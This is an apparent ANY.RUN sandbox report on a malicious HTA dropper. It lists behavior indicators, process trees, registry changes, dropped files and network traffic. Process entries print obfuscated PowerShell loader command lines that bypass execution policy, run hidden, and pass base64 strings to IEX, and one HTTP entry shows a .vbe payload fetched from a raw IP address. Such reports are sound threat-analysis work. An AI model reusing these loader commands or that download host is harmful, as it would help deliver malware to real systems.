File name:

botharefgoodformajorworktogivebestthignstodobetter.hta

Full analysis: https://app.any.run/tasks/3c6292d2-7105-4fe5-a8d2-85851e997757
Verdict: Malicious activity
Analysis date: May 19, 2025, 17:44:05
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (29407), with no line terminators
MD5:

FAC0940EB10EF7DD57EA7348D1176D02

SHA1:

5F5F6A707F54B9060B1CA82F3C1233D52751F724

SHA256:

7669571AB106028C768CA287ED8D40F62F74A8620A1814E00906BF5019648B24

SSDEEP:

96:/1I4kBWg4v+Wnkn9gLImHQhHHAHjEQD4R74cAkqe5WOwC4s:/1cBWWWnkn9sImHknejE9Akqe5WOwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 7000)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1300)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5960)
    • Starts Visual C# compiler

      • powershell.exe (PID: 1300)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 1300)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1532)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7000)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7000)
      • wscript.exe (PID: 6644)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Uses .NET C# to load dll

      • powershell.exe (PID: 1300)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 1072)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 1072)
    • Connects to the server without a host name

      • powershell.exe (PID: 1300)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6644)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7000)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 1072)
    • Checks supported languages

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)
    • Create files in a temporary directory

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)
    • Checks proxy server information

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 1300)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 5960)
      • powershell.exe (PID: 1532)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Disables trace logs

      • powershell.exe (PID: 1532)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 1532)
    • Reads the software policy settings

      • slui.exe (PID: 3888)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
140
Monitored processes
12
Malicious processes
5
Suspicious processes
0

Behavior graph

Processes in the behavior graph: mshta.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, sppextcomobj.exe (no specs), slui.exe, csc.exe, cvtres.exe (no specs), wscript.exe (no specs), powershell.exe, conhost.exe (no specs), slui.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
1072
CMD:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nkcfha5o.cmdline"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
PID:
1300
CMD:
pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'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'+[CHar]34+'))')))"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID:
1532
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$mavis = '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' -replace '','';$palmad = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($mavis));Invoke-Expression $palmad;"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID:
1676
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2504
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
3096
CMD:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path:
C:\Windows\System32\SppExtComObj.Exe
Parent process:
svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID:
3888
CMD:
"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path:
C:\Windows\System32\slui.exe
Parent process:
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID:
5376
CMD:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDA54.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Parent process:
csc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
PID:
5960
CMD:
"C:\WINDOWS\system32\cmd.exe" "/C pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'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'+[CHar]34+'))')))"
Path:
C:\Windows\SysWOW64\cmd.exe
Parent process:
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID:
6576
CMD:
C:\WINDOWS\System32\slui.exe -Embedding
Path:
C:\Windows\System32\slui.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
15 030
Read events
15 008
Write events
22
Delete events
0

Modification events

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation: write
Name: VBEFile
Value:

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0
Executable files
1
Suspicious files
4
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 1300
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_plb444vq.flm.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1300
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\nkcfha5o.0.cs
Type: text
MD5: 88854F2E82D733E29DAACC1FADD9F47E
SHA256: ADEE1BA5296DAC9742F9E196C32238AFF5F62FD2D301863C78C35DEAA186A1EF

PID: 1300
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lefbshjd.rj3.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1300
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pulkxdb4.eiv.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1300
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 3252B37D83421C22EF5C9D59215D4B48
SHA256: B3F0000B0683F43E8435A84D61B17F7258104DE45E87CBDB2025D9C6135600B8

PID: 1532
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nmwqfj3j.hm4.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1532
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xsqgoy2a.dt3.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5376
Process: cvtres.exe
Filename: C:\Users\admin\AppData\Local\Temp\RESDA54.tmp
Type: binary
MD5: 15505B1C8CDA2C36298F50E00CEECB4D
SHA256: 23FF466BF146093D12C27FAF605407154E0A68ECEBA71EE21689107517E7B98D

PID: 1072
Process: csc.exe
Filename: C:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP
Type: binary
MD5: 0D5AD3A848B09F738D74257F93C9D2C0
SHA256: 43E172FC4991E2401B2A8396636E2061BEC54204563C6FEA0B4D2599D4EF160A

PID: 1072
Process: csc.exe
Filename: C:\Users\admin\AppData\Local\Temp\nkcfha5o.dll
Type: executable
MD5: 01838917EB83452F6BBE5F25D685CDD6
SHA256: CC05A11028CE57655BAAF832E75C88E9D8CCF97D6F408DA764C1410DE7878320
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1300
powershell.exe
GET
200
107.173.47.164:80
http://107.173.47.164/970/botharefgoodformajorworktogivebestthignstodobetter.vbe
unknown
unknown
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1300
powershell.exe
107.173.47.164:80
AS-COLOCROSSING
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.14
  • 40.126.32.133
  • 20.190.160.128
  • 40.126.32.136
  • 20.190.160.64
  • 20.190.160.67
  • 40.126.32.72
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

No threats detected
No debug info